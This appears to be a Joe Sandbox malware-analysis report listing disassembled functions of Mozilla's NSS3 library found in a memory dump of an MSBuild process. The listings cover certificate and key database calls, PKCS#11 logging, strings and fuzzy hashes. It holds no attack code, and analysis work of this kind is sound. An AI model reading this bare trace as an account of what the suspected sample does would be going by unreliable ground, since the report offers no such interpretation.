Instruction ID: 68cfbea4882f93c2c216189d793949e413a2d9349d163b9dc8bf101f498fe321
Opcode Fuzzy Hash: f77e206c6a8e50d3ce21e69af11e0e4ed98c6da3b6ce5b7d8855eeeea9a4cfb8
Instruction Fuzzy Hash: 6E41BDB190518567DB119FB49C44ABB3AB5AF8A30CF184136EC161BB01EB71E924C7DB

Function 6C6C6CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6C6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C6C6943
Part of subcall function 6C6C6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C6C6957
Part of subcall function 6C6C6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C6C6972
Part of subcall function 6C6C6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C6C6983
Part of subcall function 6C6C6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C6C69AA
Part of subcall function 6C6C6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C6C69BE
Part of subcall function 6C6C6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C6C69D2
Part of subcall function 6C6C6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C6C69DF
Part of subcall function 6C6C6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C6C6A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C6C6D8C
free.MOZGLUE(00000000), ref: 6C6C6DC5
free.MOZGLUE(?), ref: 6C6C6DD6
free.MOZGLUE(?), ref: 6C6C6DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C6C6E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C6C6E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C6C6E72
free.MOZGLUE(?), ref: 6C6C6EA7
free.MOZGLUE(?), ref: 6C6C6EC4
free.MOZGLUE(?), ref: 6C6C6ED5
free.MOZGLUE(00000000), ref: 6C6C6EE3
free.MOZGLUE(?), ref: 6C6C6EF4
free.MOZGLUE(?), ref: 6C6C6F08
free.MOZGLUE(00000000), ref: 6C6C6F35
free.MOZGLUE(?), ref: 6C6C6F44
free.MOZGLUE(?), ref: 6C6C6F5B
free.MOZGLUE(00000000), ref: 6C6C6F65

Part of subcall function 6C6C6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C6C781D,00000000,6C6BBE2C,?,6C6C6B1D,?,?,?,?,00000000,00000000,6C6C781D), ref: 6C6C6C40
Part of subcall function 6C6C6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C6C781D,?,6C6BBE2C,?), ref: 6C6C6C58
Part of subcall function 6C6C6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C6C781D), ref: 6C6C6C6F
Part of subcall function 6C6C6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C6C6C84
Part of subcall function 6C6C6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C6C6C96
Part of subcall function 6C6C6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C6C6CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C6C6F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C6C6FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C6C6FF4

Strings

+`ml, xrefs: 6C6C6D0D

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID: +`ml
API String ID: 1304971872-2331444378
Opcode ID: 7edb76baf985e000a87bd55be9f97aeb3ce9067c2598fe0e51849d7c25b61df6
Instruction ID: c9fda0881f377f5cab40cdfadffc32a892601cd0fe8e47d56bebef9d33cd7bd0
Opcode Fuzzy Hash: 7edb76baf985e000a87bd55be9f97aeb3ce9067c2598fe0e51849d7c25b61df6
Instruction Fuzzy Hash: C4B16CB4F052199BDF00DBA9D844BAEBBB9FF49349F140025E815E7601E731E905CBAE

Function 6C6E0550 Relevance: 35.2, APIs: 13, Strings: 7, Instructions: 182stringCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(NSS_ALLOW_WEAK_SIGNATURE_ALG,00000002,00000000,?,6C6C5989), ref: 6C6E0571

Part of subcall function 6C671240: TlsGetValue.KERNEL32(00000040,?,6C67116C,NSPR_LOG_MODULES), ref: 6C671267
Part of subcall function 6C671240: EnterCriticalSection.KERNEL32(?,?,?,6C67116C,NSPR_LOG_MODULES), ref: 6C67127C
Part of subcall function 6C671240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C67116C,NSPR_LOG_MODULES), ref: 6C671291
Part of subcall function 6C671240: PR_Unlock.NSS3(?,?,?,?,6C67116C,NSPR_LOG_MODULES), ref: 6C6712A0

PR_GetEnvSecure.NSS3(NSS_HASH_ALG_SUPPORT,?,00000002,00000000,?,6C6C5989), ref: 6C6E05B7
PORT_Strdup_Util.NSS3(00000000,?,?,00000002,00000000,?,6C6C5989), ref: 6C6E05C8
strchr.VCRUNTIME140(00000000,0000003B,?,?,?,00000002,00000000,?,6C6C5989), ref: 6C6E05EC
strstr.VCRUNTIME140(00000001,?), ref: 6C6E0653
free.MOZGLUE(?,?,?,?,00000002,00000000,?,6C6C5989), ref: 6C6E0681
PORT_NewArena_Util.NSS3(00000800,?,?,?,?,00000002,00000000,?,6C6C5989), ref: 6C6E06AB
PL_NewHashTable.NSS3(00000000,6C6DFE80,?,6C72C350,00000000,00000000,?,?,?,?,?,00000002,00000000,?,6C6C5989), ref: 6C6E06D5
PL_NewHashTable.NSS3(00000000,?,6C72C350,6C72C350,00000000,00000000), ref: 6C6E06EC
PL_HashTableAdd.NSS3(?,6C7AE618,6C7AE618), ref: 6C6E070F

Part of subcall function 6C602DF0: PL_HashTableRawAdd.NSS3(?,?,?,?,?), ref: 6C602E35

PL_HashTableAdd.NSS3(FFFFFFFF,6C7AE618), ref: 6C6E0738
PL_HashTableAdd.NSS3(6C7AE634,6C7AE634), ref: 6C6E0752
PR_SetError.NSS3(FFFFE001,00000000,?,?,?,?,00000002,00000000,?,6C6C5989), ref: 6C6E0767

Strings

$~l, xrefs: 6C6E0645
NSS_HASH_ALG_SUPPORT, xrefs: 6C6E05B2
dynamic OID data, xrefs: 6C6E068A
flags, xrefs: 6C6E0555
4zl, xrefs: 6C6E071B
V, xrefs: 6C6E0559
NSS_ALLOW_WEAK_SIGNATURE_ALG, xrefs: 6C6E056C

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: HashTable$SecureUtil$Arena_CriticalEnterErrorSectionStrdup_UnlockValuefreegetenvstrchrstrstr
String ID: 4zl$NSS_ALLOW_WEAK_SIGNATURE_ALG$NSS_HASH_ALG_SUPPORT$V$dynamic OID data$flags$$~l
API String ID: 514890423-3720180156
Opcode ID: ea686a5078626dcd30812e666df79cd4a456ea7867e726299513cf7de7bd0784
Instruction ID: b79d538d0e7ef3546c453f81b963cc002b764190d8ccf6fa2f6f6140c43d28c4
Opcode Fuzzy Hash: ea686a5078626dcd30812e666df79cd4a456ea7867e726299513cf7de7bd0784
Instruction Fuzzy Hash: 8D5108B2E0A2865FEB408B659D087573BB4AB4F358F180536D818D7B81FB30D905DBA9

Function 6C6C2D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C6C2DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C6C2E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6C2E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6C2E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C694F1C,?,-00000001,00000000,?), ref: 6C6C2E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C694F1C,?,-00000001,00000000), ref: 6C6C2E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C6C2EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C6C2EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C6C2EF8
PR_Unlock.NSS3(?), ref: 6C6C2F62
TlsGetValue.KERNEL32 ref: 6C6C2F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6C6C2F9E
PR_Unlock.NSS3(?), ref: 6C6C2FCA
TlsGetValue.KERNEL32 ref: 6C6C301A
EnterCriticalSection.KERNEL32(?), ref: 6C6C302E
PR_Unlock.NSS3(?), ref: 6C6C3066
PR_SetError.NSS3(00000000,00000000), ref: 6C6C3085
PR_Unlock.NSS3(?), ref: 6C6C30EC
TlsGetValue.KERNEL32 ref: 6C6C310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6C6C3124
PR_Unlock.NSS3(?), ref: 6C6C314C

Part of subcall function 6C6A9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C6D379E,?,6C6A9568,00000000,?,6C6D379E,?,00000001,?), ref: 6C6A918D
Part of subcall function 6C6A9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C6D379E,?,6C6A9568,00000000,?,6C6D379E,?,00000001,?), ref: 6C6A91A0

Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707AD
Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707CD
Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707D6
Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C60204A), ref: 6C6707E4
Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,6C60204A), ref: 6C670864
Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C670880
Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,6C60204A), ref: 6C6708CB
Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708D7
Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708FB

PR_SetError.NSS3(00000000,00000000), ref: 6C6C316D

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: 84d62c13892abde21f2c93f0ed17f13e0e288c9a37e9ae826223d5e014b13236
Instruction ID: 4dbdaa40bafe85fd409733101bfaf79c06853322a71336ab1acde8aa447152d1
Opcode Fuzzy Hash: 84d62c13892abde21f2c93f0ed17f13e0e288c9a37e9ae826223d5e014b13236
Instruction Fuzzy Hash: 97F18DB1E006089FDF00DF68D889ADABBB5FF09318F144169EC04A7711EB31E995CB96

Function 6C6C25D0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

PK11_ImportPublicKey.NSS3(00000000,?,00000000,?,?,?,?,?,?,-00000001,?,?,?,6C69662E,?,?), ref: 6C6C264E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C69662E,?,?), ref: 6C6C2670
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C69662E,?), ref: 6C6C2684
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C6C26C2
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6C6C26E0
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C6C26F4
PR_Unlock.NSS3(?), ref: 6C6C274D
PR_SetError.NSS3(00000000,00000000), ref: 6C6C28A9

Part of subcall function 6C6D3440: PK11_GetAllTokens.NSS3 ref: 6C6D3481
Part of subcall function 6C6D3440: PR_SetError.NSS3(00000000,00000000), ref: 6C6D34A3
Part of subcall function 6C6D3440: TlsGetValue.KERNEL32 ref: 6C6D352E
Part of subcall function 6C6D3440: EnterCriticalSection.KERNEL32(?), ref: 6C6D3542
Part of subcall function 6C6D3440: PR_Unlock.NSS3(?), ref: 6C6D355B

PR_Unlock.NSS3(?), ref: 6C6C27A1
PR_SetError.NSS3(FFFFE040,00000000,?,?,?,?,?,?,-00000001,?,?,?,6C69662E,?,?,?), ref: 6C6C27B5
PR_Unlock.NSS3(?), ref: 6C6C27CE
TlsGetValue.KERNEL32 ref: 6C6C27E8
EnterCriticalSection.KERNEL32(0000001C), ref: 6C6C2800

Part of subcall function 6C6CF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C6CF854
Part of subcall function 6C6CF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C6CF868
Part of subcall function 6C6CF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C6CF882
Part of subcall function 6C6CF820: free.MOZGLUE(04C483FF,?,?), ref: 6C6CF889
Part of subcall function 6C6CF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C6CF8A4
Part of subcall function 6C6CF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C6CF8AB
Part of subcall function 6C6CF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C6CF8C9
Part of subcall function 6C6CF820: free.MOZGLUE(280F10EC,?,?), ref: 6C6CF8D0

PR_Unlock.NSS3(?), ref: 6C6C2834
TlsGetValue.KERNEL32 ref: 6C6C284E
EnterCriticalSection.KERNEL32(0000001C), ref: 6C6C2866

Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707AD
Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707CD
Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707D6
Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C60204A), ref: 6C6707E4
Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,6C60204A), ref: 6C670864
Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C670880
Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,6C60204A), ref: 6C6708CB
Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708D7
Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708FB

Strings

.fil, xrefs: 6C6C2618, 6C6C2632
.fil, xrefs: 6C6C261B, 6C6C269B, 6C6C26CA, 6C6C2780, 6C6C2890, 6C6C2635, 6C6C269E, 6C6C2738, 6C6C2783

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Value$CriticalSection$Unlock$Enterfree$DeleteError$K11_calloc$ImportPublicTokens
String ID: .fil$.fil
API String ID: 544520609-325794162
Opcode ID: 022a70df9fb1b9a865d23a40146609930c9f605eb926692a6ebfa51c613ec008
Instruction ID: 0c56abfedbc0ea26ed6b0dbf387c3b2f537663344efbe087a4557d0a53286a99
Opcode Fuzzy Hash: 022a70df9fb1b9a865d23a40146609930c9f605eb926692a6ebfa51c613ec008
Instruction Fuzzy Hash: 6FB1E4B1A00605DFDB00DF68D888A9AB7B4FF09308F505539ED05A7B01EB31E955CBA6

Function 6C6B6D60 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6C6B6D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6B6DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B6DC3

Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963

PR_LogPrint.NSS3(?,00000000), ref: 6C6B6DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C6B6DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C6B6E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C6B6E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C6B6E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C6B6EB9

Strings

*pulDigestLen = 0x%x, xrefs: 6C6B6EB4
C_Digest, xrefs: 6C6B6D81
hSession = 0x%x, xrefs: 6C6B6D9E, 6C6B6DAE
nyl, xrefs: 6C6B6E61, 6C6B6E95
pDigest = 0x%p, xrefs: 6C6B6E27
pData = 0x%p, xrefs: 6C6B6DF5
ulDataLen = %d, xrefs: 6C6B6E0E
(CK_INVALID_HANDLE), xrefs: 6C6B6DBC
pulDigestLen = 0x%p, xrefs: 6C6B6E42

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest$nyl
API String ID: 1003633598-3362337952
Opcode ID: 53e446827faade7445eabfb1cf09b5eae9954e69232229fae6edcb8b9499ede9
Instruction ID: 2dec1aa3d0358f78a19f89a5c7bd5284e7356bb2efd76cf7339c908703081f30
Opcode Fuzzy Hash: 53e446827faade7445eabfb1cf09b5eae9954e69232229fae6edcb8b9499ede9
Instruction Fuzzy Hash: 6441B736601009AFDB04DF54DE4DB8A7BB1AB4A719F044034F508AB611DF31E96ACBA6

Function 6C6B8500 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptDigestUpdate), ref: 6C6B8526
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6B8554
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B8563

Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963

PR_LogPrint.NSS3(?,00000000), ref: 6C6B8579
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C6B859A
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6C6B85B3
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C6B85CC
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6C6B85E7
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6C6B8659

Strings

hSession = 0x%x, xrefs: 6C6B853E, 6C6B854E
nyl, xrefs: 6C6B8601, 6C6B8635
pPart = 0x%p, xrefs: 6C6B85C7
pulPartLen = 0x%p, xrefs: 6C6B85E2
ulEncryptedPartLen = %d, xrefs: 6C6B85AE
(CK_INVALID_HANDLE), xrefs: 6C6B855C
pEncryptedPart = 0x%p, xrefs: 6C6B8595
*pulPartLen = 0x%x, xrefs: 6C6B8654
C_DecryptDigestUpdate, xrefs: 6C6B8521

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptDigestUpdate$nyl
API String ID: 1003633598-473548163
Opcode ID: 33527ee74d151faaae1665a44836339fc9260a93b514ef51954be1e414b6f11c
Instruction ID: c4524ae7387d8a341d182d97bec9f545535ab20123e9aa18b5f6ca4d7b95d730
Opcode Fuzzy Hash: 33527ee74d151faaae1665a44836339fc9260a93b514ef51954be1e414b6f11c
Instruction Fuzzy Hash: F241C836601146AFDB40DF54DE4CE8A3BB1AB4E35DF084075F8086B621DF31DA69CBA6

Function 6C6C4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C6C4C4C
EnterCriticalSection.KERNEL32(?), ref: 6C6C4C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C6C4CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C6C4CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C6C4CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6C4D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6C4D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C6C4DB7

Part of subcall function 6C72DD70: TlsGetValue.KERNEL32 ref: 6C72DD8C
Part of subcall function 6C72DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C72DDB4

Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707AD
Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707CD
Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707D6
Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C60204A), ref: 6C6707E4
Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,6C60204A), ref: 6C670864
Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C670880
Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,6C60204A), ref: 6C6708CB
Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708D7
Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708FB

TlsGetValue.KERNEL32 ref: 6C6C4DD7
EnterCriticalSection.KERNEL32(?), ref: 6C6C4DEC
PR_Unlock.NSS3(?), ref: 6C6C4E1B
PR_SetError.NSS3(00000000,00000000), ref: 6C6C4E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6C4E5A
PR_SetError.NSS3(00000000,00000000), ref: 6C6C4E71
free.MOZGLUE(00000000), ref: 6C6C4E7A
PR_Unlock.NSS3(?), ref: 6C6C4EA2
TlsGetValue.KERNEL32 ref: 6C6C4EC1
EnterCriticalSection.KERNEL32(?), ref: 6C6C4ED6
PR_Unlock.NSS3(?), ref: 6C6C4F01
free.MOZGLUE(00000000), ref: 6C6C4F2A

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: e38fc24418d2a0e4f236e2bee345a124a28a7368c9d334f9959a2a12835c45f9
Instruction ID: 01132f349bf8c36bbba34cf9e710e93b7a476b9807b3ef59e354b087a77f1009
Opcode Fuzzy Hash: e38fc24418d2a0e4f236e2bee345a124a28a7368c9d334f9959a2a12835c45f9
